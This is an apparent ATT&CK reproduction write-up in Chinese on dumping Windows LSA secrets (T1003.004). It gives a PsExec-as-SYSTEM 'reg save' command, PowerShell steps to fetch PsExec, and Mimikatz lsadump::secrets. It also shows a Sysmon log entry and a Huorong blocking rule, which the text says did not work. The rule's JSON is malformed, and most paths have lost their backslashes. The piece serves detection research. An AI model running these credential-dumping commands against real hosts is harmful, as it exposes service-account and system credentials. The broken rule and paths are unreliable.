0x01 基础信息

具体信息	详情
ATT&CK编号	T1003-004
所属战术阶段	凭据访问
操作系统	windows 7 旗舰版 SP1
监测平台	火绒安全、火绒剑、sysmon

0x02 技术原理

对主机具有 SYSTEM 访问权限的攻击者可能会尝试访问本地安全机构 (LSA) 机密，其中可能包含各种不同的凭证材料，例如服务帐户的凭证。

LSA 机密存储在注册表中的HKEY_LOCAL_MACHINESECURITYPolicySecrets. LSA 机密也可以从内存中转储。（引用：ired Dumping LSA Secrets）

Reg可用于从注册表中提取。Mimikatz可用于从内存中提取秘密。（引用：ired Dumping LSA Secrets）

0x03 复现环境

工具列表	相关链接
sysmon日志记录工具	https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
sysmon默认规则文件	https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
sysmon安装命令	sysmon64.exe   -accepteula  -i  sysmonconfig-export.xml
攻击条件	已经获取管理员权限的shell

0x04 复现过程

• Dumping LSA Secrets

从 Windows 注册表中转储密钥成功后，转储文件将写入 $env:Tempsecrets。攻击者可能会使用密钥来协助提取密码和枚举其他敏感系统信息。

LSA Secrets 是一个注册表位置，其中包含本地安全机构使用的重要数据，如身份验证、登录用户到主机、本地安全策略等。此信息存储在以下注册表项中。

HKEY_LOCAL_MACHINE/Security/Policy/Secrets

由于信息的敏感性，Windows 正在使用权限保护对注册表中 Security 文件夹的访问。默认情况下，只有 SYSTEM 帐户可以访问 LSA Secrets 注册表位置。

为管理员帐户授予适当的权限并重新打开注册表将显示安全文件夹中包含的所有子文件夹。

此位置包含以加密格式登录的帐户的密码。但是，反向密码的密钥存储在父密钥中：Policy。

HKEY_LOCAL_MACHINE/Security/Policy

名字	描述	默认值
psexec.exe	PsExec 可执行文件的路径	Path To swordheart  FolderT1003.004PsExec.exe

• 攻击命令

psexec.exe -accepteula -s reg save HKLMsecuritypolicysecrets  %temp%secrets /y

• 获取先决条件命令

#从互联网下载PSTools.zip
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMPPSTools.zip"  
#从指定的存档 (压缩) 文件中提取文件
Expand-Archive $env:TEMPPSTools.zip $env:TEMPPSTools -Force  
#创建文件夹
New-Item -ItemType Directory (Split-Path #{psexec.exe}) -Force | Out-Null
#复制文件到此目录
Copy-Item $env:TEMPPSToolsPsExec.exe #{psexec.exe} -Force

使用 psexec 将 reg.exe 作为系统运行并转储 LSA 机密

具有SYSTEM权限的攻击者可能会尝试转储 LSA 机密，其中可能包含一系列不同的凭据，例如服务帐户凭据。

也可以使用Mimikatz 的lsadump::secrets命令从内存中转储LSA 机密，在使用 Mimikatz 的 lsadump 模块转储 LSA 机密之前，您可能需要使用token:: elevate命令来模拟SYSTEM令牌。

0x05 检测方法

1.日志特征

Process Create:
RuleName: -
UtcTime: 2022-12-06 06:27:11.124
ProcessGuid: {366efb63-0000-0000-04a7-170000000000}
ProcessId: 1444
Image: C:UsersAdministratorDesktopT1003-004PsExec.exe
FileVersion: 2.4
Description: Execute processes remotely
Product: Sysinternals PsExec
Company: Sysinternals - www.sysinternals.com
OriginalFileName: psexec.c
CommandLine: PsExec.exe  -accepteula -s reg save HKLMsecuritypolicysecrets   secrets
CurrentDirectory: C:UsersAdministratorDesktopT1003-004
User: SWORDHEARTAdministrator
LogonGuid: {366efb63-0000-0000-2872-100000000000}
LogonId: 0x107228
TerminalSessionId: 1
IntegrityLevel: High
Hashes: MD5=CB8A14388E1DA3956849D638AF50FE9D,SHA256=08C6E20B1785D4EC4E3F9956931D992377963580B4B2C6579FD9930E08882B1C,IMPHASH=9DCB7567A35DBB52EF2F98731BD1CD47
ParentProcessGuid: {366efb63-0000-0000-6f96-170000000000}
ParentProcessId: 2692
ParentImage: C:WindowsSystem32cmd.exe
ParentCommandLine: "C:WindowsSystem32cmd.exe" 
ParentUser: SWORDHEARTAdministrator

2.攻击日志

在针对注册表进行操作的时候，并没有触发火绒的拦截行为

0x06 处置方法与规则编写

1.处置方法

通过自定义规则去限制通过cmd使用reg去转储secrets注册表项中的内容

2.火绒规则编写

进行测试后，发现并不能触发火绒防护策略

{
    "ver":"5.0",
    "tag":"hipsuser",
    "data":[
        {
            "id":10,
            "power":1,
            "name":"T1003-004-操作系统凭据转储:LSA机密",
            "procname":"C:\Windows\System32\cmd.exe",
            "treatment":1,
            "policies":[
                {
                    "montype":1,
                    "action_type":15,
                    "res_path":"C:\Windows\system32\reg.exe"
                },
                {
                    "montype":2,
                    "action_type":15,
                    "res_path":"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\*"
                },
                    "action_type":15,
                    "res_path":"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\*"
                }
            ]
        }
    ]
}

0x07 总结

从以上实验可以看出，正常来说，LSA 允许应用程序以用户权限运行，但是我们可以使用 psexec 将 reg.exe 作为系统权限运行并转储 LSA 机密，通过psexec和mimikatz的token:: elevate可以提升系统的权限，转储LSA的机密信息。攻击者可能会使用密钥来协助提取密码和枚举其他敏感系统信息，通过psexec可以绕过火绒防护，轻松获取LSA的机密信息。

原文始发于微信公众号（闪焰安全服务团队）：ATT&CK框架_操作系统凭据转储：LSA 机密